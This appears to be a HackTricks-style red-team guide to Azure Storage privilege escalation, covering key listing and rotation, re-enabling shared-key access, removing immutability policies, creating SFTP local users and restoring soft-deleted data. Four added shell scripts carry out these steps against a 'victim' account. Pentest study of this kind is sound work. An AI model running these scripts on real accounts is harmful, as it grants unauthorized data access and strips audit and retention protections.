Az - Storage Privesc
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
For more information about storage check:
A principal with the Microsoft.Storage/storageAccounts/listKeys/action permission can list the access keys of a storage account, including their secret values. An access key grants full data-plane access to every service in the account regardless of the caller's RBAC roles, so this lets the principal escalate its privileges over the storage account.
A principal with the Microsoft.Storage/storageAccounts/regenerateKey/action permission can renew an access key of a storage account and receives the new secret value in the response, which again lets the principal escalate its privileges over the storage account (at the cost of breaking whatever was using the rotated key).
Moreover, the response to the renew request contains the value of the renewed key and also of the key that was not renewed:
A principal with the Microsoft.Storage/storageAccounts/write permission can create a storage account or update an existing one, changing any setting such as network rules (firewall, allowed IPs, public network access) or policies, including re-enabling shared-key authentication if it had been disabled.
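The following is an added example, not code from the HackTricks page: it chains the three permissions above (write to re-open the account, then listKeys or regenerateKey, then use of the key on the data plane). The resource group "rg-victim", account "victimstorage" and container "backups" are assumed names, the RUN_AGAINST_AZURE switch is an assumption of this script, and the az calls only run when that switch is set and az login has been done; the sample JSON is constructed to mirror the shape of the az storage account keys list output so the helpers can be exercised offline.

```shell
#!/bin/sh
# Added example (not HackTricks' own code): abuse listKeys/regenerateKey, after using
# storageAccounts/write to re-enable shared-key access if it had been disabled.
# Assumed names: resource group "rg-victim", account "victimstorage", container "backups".
set -eu

RG="${RG:-rg-victim}"
ACCOUNT="${ACCOUNT:-victimstorage}"

# Constructed sample of `az storage account keys list` output (key values made up;
# real ones are 88-character base64 strings). Used to exercise the helpers offline.
SAMPLE_KEYS_JSON='[
  {"creationTime": "2024-01-01T00:00:00.000000+00:00", "keyName": "key1", "permissions": "FULL", "value": "AAAAexamplekey1AAAA=="},
  {"creationTime": "2024-01-01T00:00:00.000000+00:00", "keyName": "key2", "permissions": "FULL", "value": "BBBBexamplekey2BBBB=="}
]'

# extract_key JSON KEYNAME: pull the secret value of key1 or key2 out of the JSON
# array returned by `keys list` / `keys renew` (fields are emitted alphabetically,
# so "keyName" precedes "value" inside each object).
extract_key() {
  printf '%s' "$1" | tr -d '\n\r' |
    sed -n "s/.*\"keyName\": *\"$2\"[^}]*\"value\": *\"\([^\"]*\)\".*/\1/p"
}

# build_connection_string ACCOUNT KEY: a connection string any SDK or CLI accepts;
# it grants full data-plane access independent of the caller's RBAC roles.
build_connection_string() {
  printf 'DefaultEndpointsProtocol=https;AccountName=%s;AccountKey=%s;EndpointSuffix=core.windows.net' "$1" "$2"
}

# Live steps (only executed when RUN_AGAINST_AZURE=1 and `az login` has been done).
run_live() {
  # 1. storageAccounts/write: make sure shared-key auth and network access are open.
  az storage account update -g "$RG" -n "$ACCOUNT" --allow-shared-key-access true \
     --public-network-access Enabled --default-action Allow >/dev/null

  # 2. listKeys/action: read both keys and take key1.
  keys_json="$(az storage account keys list -g "$RG" --account-name "$ACCOUNT" -o json)"
  key="$(extract_key "$keys_json" key1)"

  # 2b. With regenerateKey/action instead: rotate key2; the response still carries key1.
  #     Rotation breaks whatever currently uses key2, so prefer listing when possible.
  # keys_json="$(az storage account keys renew -g "$RG" --account-name "$ACCOUNT" --key secondary -o json)"

  # 3. Use the key on the data plane, bypassing RBAC data actions entirely.
  az storage blob list --account-name "$ACCOUNT" --account-key "$key" -c backups -o table
  az storage container list --connection-string "$(build_connection_string "$ACCOUNT" "$key")" -o table
}

if [ "${RUN_AGAINST_AZURE:-0}" = 1 ]; then run_live; fi
```

Note that step 1 is what makes the write permission dangerous on its own: disabling shared-key access is a common hardening control, and this permission silently undoes it before the key is even read.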
The first permission (Microsoft.Storage/storageAccounts/blobServices/containers/immutabilityPolicies/write) allows modifying immutability policies on containers and the second (Microsoft.Storage/storageAccounts/blobServices/containers/immutabilityPolicies/delete) allows deleting them, which removes the protection that keeps blobs from being overwritten or deleted.
Note that if an immutability policy is in the locked state, neither is possible: a locked policy cannot be deleted or shortened, only extended.
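As an added example (not from the HackTricks page), the check a practitioner wants before trying either permission: read the policy, and only attempt the delete when it is unlocked. The account "victimstorage", resource group "rg-victim" and container "audit-logs" are assumed names, RUN_AGAINST_AZURE is an assumed switch, and the two sample JSON documents are constructed to match the shape of the az storage container immutability-policy show output.

```shell
#!/bin/sh
# Added example (not HackTricks' own code): remove a container's time-based retention
# policy, but only after checking that it is not locked.
# Assumed names: account "victimstorage", resource group "rg-victim", container "audit-logs".
set -eu

ACCOUNT="${ACCOUNT:-victimstorage}"
RG="${RG:-rg-victim}"
CONTAINER="${CONTAINER:-audit-logs}"

# policy_state JSON: print "locked", "unlocked" or "none" from the output of
# `az storage container immutability-policy show` (empty input = no policy).
policy_state() {
  case "$(printf '%s' "$1" | tr -d '\n\r' | sed -n 's/.*"state": *"\([A-Za-z]*\)".*/\1/p')" in
    Locked)   echo locked ;;
    Unlocked) echo unlocked ;;
    *)        echo none ;;
  esac
}

# Constructed sample responses (shape of the real `show` output, values made up).
SAMPLE_UNLOCKED='{"allowProtectedAppendWrites": false, "etag": "\"0x8DC0123456789AB\"", "immutabilityPeriodSinceCreationInDays": 365, "state": "Unlocked"}'
SAMPLE_LOCKED='{"allowProtectedAppendWrites": false, "etag": "\"0x8DC0123456789AC\"", "immutabilityPeriodSinceCreationInDays": 365, "state": "Locked"}'

run_live() {
  policy_json="$(az storage container immutability-policy show --account-name "$ACCOUNT" \
                   -g "$RG" --container-name "$CONTAINER" -o json 2>/dev/null || true)"
  case "$(policy_state "$policy_json")" in
    none)
      echo "no immutability policy on $CONTAINER; its blobs are already deletable" ;;
    unlocked)
      # delete needs the policy's current etag (--if-match). With only the write
      # permission the period could instead be shortened via `... create --period 1`.
      etag="$(az storage container immutability-policy show --account-name "$ACCOUNT" \
                -g "$RG" --container-name "$CONTAINER" --query etag -o tsv)"
      az storage container immutability-policy delete --account-name "$ACCOUNT" \
         -g "$RG" --container-name "$CONTAINER" --if-match "$etag"
      echo "policy removed; blobs in $CONTAINER can now be overwritten or deleted" ;;
    locked)
      # A locked policy cannot be deleted or shortened by anyone; the only change
      # Azure accepts is `immutability-policy extend` to a longer period.
      echo "policy on $CONTAINER is locked; neither write nor delete will help" ;;
  esac
}

if [ "${RUN_AGAINST_AZURE:-0}" = 1 ]; then run_live; fi
```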
This should allow a user holding this permission to take ownership of files inside the file share.
This should allow a user holding this permission to modify the permissions of files inside the file share.
This should allow a user holding this permission to perform actions inside the file share as a superuser.
With the Microsoft.Storage/storageAccounts/localusers/write permission, an attacker can create (and, if they also hold Microsoft.Storage/storageAccounts/localusers/read, update) a local user for an Azure Storage account configured with a hierarchical namespace, choosing the user's permissions and home directory. This matters because the attacker can grant themselves access to the storage account with permissions such as read (r), write (w), delete (d), list (l) and more. The local user can authenticate with an Azure-generated password, an SSH key pair, or both. There is no check for whether a user already exists, so existing local users can be overwritten. The attacker can therefore escalate their privileges and gain SFTP access to the storage account, potentially exposing or compromising sensitive data.
With the Microsoft.Storage/storageAccounts/localusers/regeneratePassword/action permission, an attacker can regenerate the password of a local user in an Azure Storage account. The new password is returned in the response, so the attacker obtains valid SFTP credentials for that user without knowing the previous ones. With these credentials the attacker can access the storage account, transfer files, or manipulate data within the containers, resulting in data leakage, corruption, or malicious modification of the account's content.
To access Azure Blob Storage over SFTP with a local user, connect with the username <storage account>.<local user> to the host <storage account>.blob.core.windows.net; an SSH key can be used instead of the password.
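The following is an added example that is not part of the HackTricks page; it walks the whole local-user path above: enable SFTP on the account, create (or overwrite) a local user with full blob permissions, regenerate its password, and print the sftp login. The account "victimstorage", resource group "rg-victim", container "data" and user "svc-backup" are assumed names, RUN_AGAINST_AZURE is an assumed switch, and the sample JSON is constructed to match the shape of the regenerate-password response.

```shell
#!/bin/sh
# Added example (not HackTricks' own code): create/overwrite a local user with full
# blob permissions, rotate its password and build the SFTP login for it.
# Assumed names: account "victimstorage" (hierarchical namespace enabled), resource
# group "rg-victim", container "data", local user "svc-backup".
set -eu

ACCOUNT="${ACCOUNT:-victimstorage}"
RG="${RG:-rg-victim}"
CONTAINER="${CONTAINER:-data}"
LOCAL_USER="${LOCAL_USER:-svc-backup}"

# SFTP identity format used by Azure Blob Storage:
#   user "<account>.<localuser>" on host "<account>.blob.core.windows.net"
sftp_login() { printf '%s.%s' "$1" "$2"; }
sftp_host()  { printf '%s.blob.core.windows.net' "$1"; }

# extract_ssh_password JSON: pull "sshPassword" out of the regenerate-password response.
extract_ssh_password() {
  printf '%s' "$1" | tr -d '\n\r' | sed -n 's/.*"sshPassword": *"\([^"]*\)".*/\1/p'
}

# Constructed sample of `az storage account local-user regenerate-password` output.
SAMPLE_REGEN_JSON='{"sshPassword": "ExamplePassw0rd+Generated/ByAzure=="}'

run_live() {
  # storageAccounts/write: SFTP must be enabled on the account (needs hierarchical namespace).
  az storage account update -g "$RG" -n "$ACCOUNT" --enable-sftp true >/dev/null

  # localusers/write: PUT semantics, so an existing user with this name is replaced.
  # permissions: r=read w=write d=delete l=list c=create, scoped to one container.
  az storage account local-user create -g "$RG" --account-name "$ACCOUNT" -n "$LOCAL_USER" \
     --home-directory "$CONTAINER" \
     --permission-scope permissions=rwdlc service=blob resource-name="$CONTAINER" \
     --has-ssh-password true >/dev/null

  # localusers/regeneratePassword/action: the only way to learn the password.
  regen_json="$(az storage account local-user regenerate-password -g "$RG" \
                  --account-name "$ACCOUNT" -n "$LOCAL_USER" -o json)"
  password="$(extract_ssh_password "$regen_json")"

  echo "sftp $(sftp_login "$ACCOUNT" "$LOCAL_USER")@$(sftp_host "$ACCOUNT")   # password: $password"
}

if [ "${RUN_AGAINST_AZURE:-0}" = 1 ]; then run_live; fi
```

Because the create call overwrites silently, a defender's signal here is a local user whose permission scope or home directory changed without a matching change request; the password regeneration also shows up in the activity log under the account.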
With these permissions, an attacker can restore a soft-deleted container by specifying its deleted version ID, or undelete specific soft-deleted blobs within a container. This only works while the objects are still within the configured soft-delete retention period, but it can let an attacker recover sensitive data that was meant to be permanently deleted, leading to unauthorized access.
With these permissions, an attacker can restore a soft-deleted Azure file share by specifying its deleted version ID. As with containers, this is limited to the retention period, but it can let an attacker recover sensitive data that was meant to be permanently deleted, leading to unauthorized access.
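As an added example covering both recovery passages (not code from the HackTricks page): enumerate soft-deleted containers, blobs and file shares and restore each by name and deleted version. The account "victimstorage", resource group "rg-victim" and container "backups" are assumed names, RUN_AGAINST_AZURE is an assumed switch, the data-plane calls (container and blob listing) need an account key or a blob data role in addition to the ARM permissions, and the sample listing is constructed in the tab-separated shape that the az --query/-o tsv combination produces.

```shell
#!/bin/sh
# Added example (not HackTricks' own code): find and restore soft-deleted containers,
# blobs and file shares. Assumed names: account "victimstorage", resource group
# "rg-victim", container "backups".
set -eu

ACCOUNT="${ACCOUNT:-victimstorage}"
RG="${RG:-rg-victim}"

# restore_commands TSV: given "name<TAB>version" lines, as produced by
#   az storage container list --account-name A --include-deleted \
#      --query "[?deleted].[name,version]" -o tsv
# print one `az storage container restore` command per deleted container.
# A deleted container is identified by name AND version: the same name can have
# been deleted several times inside the retention window, each a separate object.
restore_commands() {
  printf '%s\n' "$1" | awk -F '\t' -v acct="$ACCOUNT" 'NF >= 2 && $2 != "" {
    printf "az storage container restore --account-name %s -n %s --deleted-version %s\n", acct, $1, $2
  }'
}

# Constructed sample listing: two deleted containers, "secrets" deleted twice.
SAMPLE_DELETED="$(printf 'backups\t01D9A0B1C2D3E4F5\nsecrets\t01D9A0B1C2D3E4F6\nsecrets\t01D9A0B1C2D3E4F7')"

run_live() {
  # Containers: list the deleted ones and undelete each (container soft delete must be on).
  listing="$(az storage container list --account-name "$ACCOUNT" --include-deleted \
               --query "[?deleted].[name,version]" -o tsv)"
  restore_commands "$listing" | sh

  # Soft-deleted blobs inside a live container (`--include d` adds deleted blobs).
  az storage blob list --account-name "$ACCOUNT" -c backups --include d \
     --query "[?deleted].name" -o tsv |
  while IFS= read -r blob; do
    az storage blob undelete --account-name "$ACCOUNT" -c backups -n "$blob"
  done

  # File shares (management plane): list deleted shares and restore by deleted version.
  az storage share-rm list -g "$RG" --storage-account "$ACCOUNT" --include-deleted \
     --query "[?deleted].[name,version]" -o tsv |
  while IFS="$(printf '\t')" read -r share version; do
    az storage share-rm restore -g "$RG" --storage-account "$ACCOUNT" -n "$share" --deleted-version "$version"
  done
}

if [ "${RUN_AGAINST_AZURE:-0}" = 1 ]; then run_live; fi
```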
Microsoft.Storage/storageAccounts/blobServices/containers/blobs/manageOwnership/action: Changes ownership of the blob
Microsoft.Storage/storageAccounts/blobServices/containers/blobs/modifyPermissions/action: Modifies permissions of the blob
Microsoft.Storage/storageAccounts/blobServices/containers/blobs/runAsSuperUser/action: Returns the result of the blob command
Microsoft.Storage/storageAccounts/blobServices/containers/blobs/immutableStorage/runAsSuperUser/action